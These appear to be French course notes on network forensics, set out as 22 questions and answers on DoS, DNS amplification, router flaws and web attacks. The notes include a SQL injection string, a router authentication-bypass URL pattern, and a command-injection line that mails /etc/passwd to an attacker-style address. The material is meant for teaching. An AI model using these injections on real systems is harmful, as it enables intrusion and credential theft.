Cours 1 : Reseautique

Question 1

Quels sont les objectifs de l’analyse du trafic reseau?

Answer 1

Identifier les trafics réseau qui sont suspects.
Découvrir le réseau qui génère du trafic douteux.
Découvrir la destination du trafic douteux.
Découvrir les sources des attaques de sécurité contre le réseau.
Identifier les problèmes du réseau.
Simple en théorie mais relativement complexe en pratique.
Le prealable est Capture et enregistrement des paquets (fichiers de trafic).

Question 2

Quelles sont les infos revelles par l’analyse du trafic reseau?

Answer 2

Comment l’intrus a accédé au réseau.
Le parcours de l’intrusion.
Les techniques d’intrusion utilisées.
Les traces laissées par l’intrus et les preuves

Question 3

Qu’est-ce que l’analyste reseau ne peut faire?

Answer 3

Résoudre seul le cas d’attaque.

Lier un suspect à une attaque.

Question 4

Quelles sont les principaux types d’attaques contre le reseau?

Answer 4

IP spoofing.
Attaque contre le routeur.
Ecoute (eavesdropping, sniffing).
Dénie de service.
Attaque de l’homme du milieu (man-in-the-middle).
Altération de données.

Question 5

Quelles sont les vulnerabilites du routeur?

Answer 5

Vulnérabilité relative à l’authentification HTTP : Avec l’aide de http//router.address/level/$NUMBER/exec/… où $NUMBER est un entier entre 16 et 99, il est possible pour un utilisateur distant d’avoir un complet accès administrateur à un routeur
Vulnérabilité NTP : En envoyant un paquet de contrôle NTP (network time protocol) fabriqué, il est possible de déclencher un buffer overflow dans le démon NTP
Vulnérabilité relative au parsing SNMP : La réception de messages SNMP malformés par un système affecté peut causer l’échec du parsing et du traitement de ces messages, d’où un crash du système ou des tentatives répétées de chargement.

Question 6

Quelles sont les types d’attaques contre le routeur?

Answer 6

Attaque de dénie de service
 Empoisonnement de la table de routage
 Attaque Hit-and-run
Attaque de paquet maltraité (Packet-mistreating)
Attaques persistantes

Question 7

Comment peut-on identifier les attaques DoS/DDoS?

Answer 7

Arrêt inhabituel des services réseau.
Indisponibilité d’un site Web particulier.
Augmentation drastique du volume de courriels indésirables (spams).

Question 8

Quelles sont les types d’attages DOS?

Answer 8

Ping de la mort (ping of death)
Teardrop (utilise fragmentation 2003)
SYN flooding
Smurf (spoofed ICMP) (utilise broadcast adresse 2003)
Buffer Overflow attack
SIP INVITE Flood Attacks
Encrypted SSL DDoS Attacks

Question 9

Quelles sont les odes d’action DoS?

Answer 9

Connectivité réseau
Manque de ressources internes
Consommation de la bande passante
Consommation des ressources
Destruction ou altération des informations de configuration

Question 10

Quelles sont les techniques de detection des attaques DoS?

Answer 10

Profilage d’activité
Surveillance de l’utilisation du CPU
Utilisation de Cisco NetFlow
Utilisation des systèmes de détection d’intrusion réseau (NIDS)

Question 11

Decrire ce qu’est un DNS AMPLIFICATION ATTACK.

Answer 11

The attacker triggers and directs the compromised machines to begin the attack
The compromised machines send a DNS query for the domain example.com and set the source IP address to the victim’s IP address
The open resolver servers ask the upstream name server(s) the location of example.com
The name server sends a reply back to the open recursive servers
The open recursive servers send DNS responses to the victim

Question 12

Comment identifie-t-on des attaques web?

Answer 12

Incapacité de l’utilisateur à accéder aux services en ligne.
Redirection des URLs bien saisis vers des sites indésirables.
Diminution inhabituelle des performances du réseau.
Redémarrage fréquent du serveur.
Anomalies dans les fichiers journaux (log).

Question 13

Quelles sont les types d’attaque

Answer 13

Cross-site scripting (XSS).
Cross-site request forgery (CSRF).
Injection SQL.
Injection de code.
Injection de commande.
Falsification de paramètre (parameter tampering).
Empoisonnement de cookie (cookie poisoning).
Buffer overflow.
Espionnage de cookie (cookie snooping).
Attaque de protocoles dans la DMZ.
Zero-day attack.
Détournement d’authentification (authentication hijacking).
Directory traversal.
Falsification de journal (log tampering).
Interception cryptographique.
Interprétation d’URL.
Usurpation d’identité.

Question 14

Qu’est-ce que du cross-site scripting? Nommer aussi deux types d’attaques XSS et les decrire.

Answer 14

Une page web dynamique exécute du code (script) malicieux sur le system de l’utilisateur.
Deux types d’attaques XSS
XSS Stocké : le code malicieux est stocké en permanence sur un serveur web cible, dans une base de données, un message de forum ou dans le journal du visiteur. Le visiteur est infecté dès l’exécution des données reçues de la source.
XSS réfléchie : Le code malicieux parvint à l’utilisateur de diverses autres manières comme le courriel. Il est par suite transmit à tous serveurs Web (vulnérables) auxquels l’utilisateur adresse des requêtes.

Question 15

Qu’est-ce que Cross-site Request Forgery (CSRF)?

Answer 15

L’attaquant force la victime à soumettre au serveur Web victime un formulaire préparé par l’attaquant.
Le formulaire soumis par l’attaquant permet de forger une requête.
Le serveur Web accepte les données du formulaire car provenant d’un utilisateur de confiance.
Utilisation d’expressions régulières pour détecter l’attaque

Question 16

Qu’est-ce qu’une inection SQL?

Answer 16

Injection SQL
Une injection SQL est un type d’exploitation d’une faille de sécurité d’une application web, en injectant une requête SQL non prévue par le système et pouvant compromettre sa sécurité.
Cette faille apparaît quand il est possible d’injecter du code SQL dans les requêtes SQL qui sont faites à partir d’une page web
Exemple
Par exemple, une requête SQL classique pour la vérification de mots de passe est SELECT * from employee WHERE userid=’$userid’ AND password=’$password’
Que se passe-t-il s’il la donnée est le texte : 1=1?

SELECT * from employee WHERE userid='' OR 1=1  La requête est évaluée à True et tout le contenu de la table sera renvoyé comme résultat.

Question 17

Qu’est-ce que l’injection de code?

Answer 17

Similaire à l’injection SQL.
Dès que l’utilisateur envoie un formulaire au serveur Web, l’attaquant pirate le formulaire (requête HTTP) en y ajoutant du code malicieux.
Exemples : commandes shell, scripts PHP.
Le serveur exécute la requête HTTP contenant le code malicieux
But : accéder au site web ou au serveur de base de données pour voler des informations comme mots de passe, numéro de carte de crédit, etc.
Exemple
; cat /etc/passwd | mail attaquant@attaquer.com
Ceci a pourrait avoir pour effet la copie du fichier passwd et son envoie par email à l’adresse indiquée.

Question 18

Qu’est-ce que le cookie poisonning?

Answer 18

L’attaquant modifie le contenu du cookie pour voler les informations personnels de l’utilisateur ou frauder sur un site web pour lequel l’utilisateur s’authentifie avec confiance.
Exemple de cookie
GET /bigstore/buy.asp?checkout=yes HTTP/1.0
Host: www.onshopline.com
Accept: /
Referrer: http://wwwonshopline.com/showprods.asp
Cookie: SESSIONID=5435761ASDD23SA2321; Basket Size=6; Item1=2189; Item2=3331; Item3=9462; Total Price=14982;
Ceci indique l’identifiant unique de session de l’utilisateur et les articles que l’utilisateur désire acheter, leurs prix respectifs et le prix total.

Question 19

Qu’est-ce que l’attaque de protocole dans la DMZ?

Answer 19

DMZ : zone réseau de demie-confiance qui sépare la zone de confiance du réseau d’une compagnie, de l’internet (non confiant).
Pour sécuriser davantage la DMZ et réduire les risques seuls quelques protocoles sont autorisés dans cette zone
FTP + TCP (ports 20, 21)
SMTP + TCP (port 25)
DNS + TCP ou UDP (port 53)
HTTP + TCP (port 80)
HTTPS + TCP (port 443)

Question 20

Quelle est la methodologie d’analyse des attaques web?

Answer 20

Méthodologie d’analyse des attaques Web
Analyse des serveurs Web, serveurs FTP and des journaux système locaux pour confirmer la présence d’attaque.
Vérifier les informations des fichiers journaux en accordant une attention particulière à l’horodatage (date, heure, minutes, secondes), les adresses IP, les code de statut HTTP et les sources des requêtes.
Identifier la nature de l’attaque.
Vérifier si une tentative d’arrêter le fonctionnement du réseau de pénétration est en cours.
Localiser la source de l’attaque.
Utiliser les journaux des pare-feux et des outils de détection d’intrusion pour identifier la source de l’attaque.
Bloquer l’attaque.
Une fois que les systèmes compromis sont identifiés, il faut les isoler (déconnecter) du reste du résau jusqu’à leur désinfection.
Bloquer l’adresse IP si l’attaque vient de l’extérieur.
Initier une recherche à partir de l’adresse IP.

Question 21

Qu’est-ce que l’analyse d’empoisonnement DNS?

Answer 21

Cache DNS corrompu.
Préalable : Décharger le contenu du cache et l’analyse afin d’identifier les entrées inappropriées.
Méthodologie d’analyse :
Démarrer un outil d’analyse de paquets comme Wireshark.
Capturer les paquets DNS.
Identifier l’adresse IP utilisée pour la résolution des noms de domaines.
Si l’adresse IP n’appartient pas au réseau alors il y a attaque d’empoisonnnement DNS.
Démarrer une recherche sur l’adresse IP : Détenteur et localisation.
Faire une recherche WHOIS Lookup à partir de l’adresse IP.

Question 22

Quels sont les types de cybercrimes?

Answer 22

Phishing
Vol d’identité
Fraude de cartes de crédit
Téléchargement illégal
Espionnage d’entreprise
Pornographie infantile
Abus sur les enfants par clavardage
Cyber-terrorisme
Création et distribution de virus et courriels indésirables

Crimes commis par envoi d’e-Mail :
Envoi de spam
Fabrication de faux e-Mails
Mail bombing
Mail storms

Crimes ayant pour support un e-Mail
Vente de narcotique
Harcèlement
Fraude
Pornographie infantile
Enlèvement d’enfant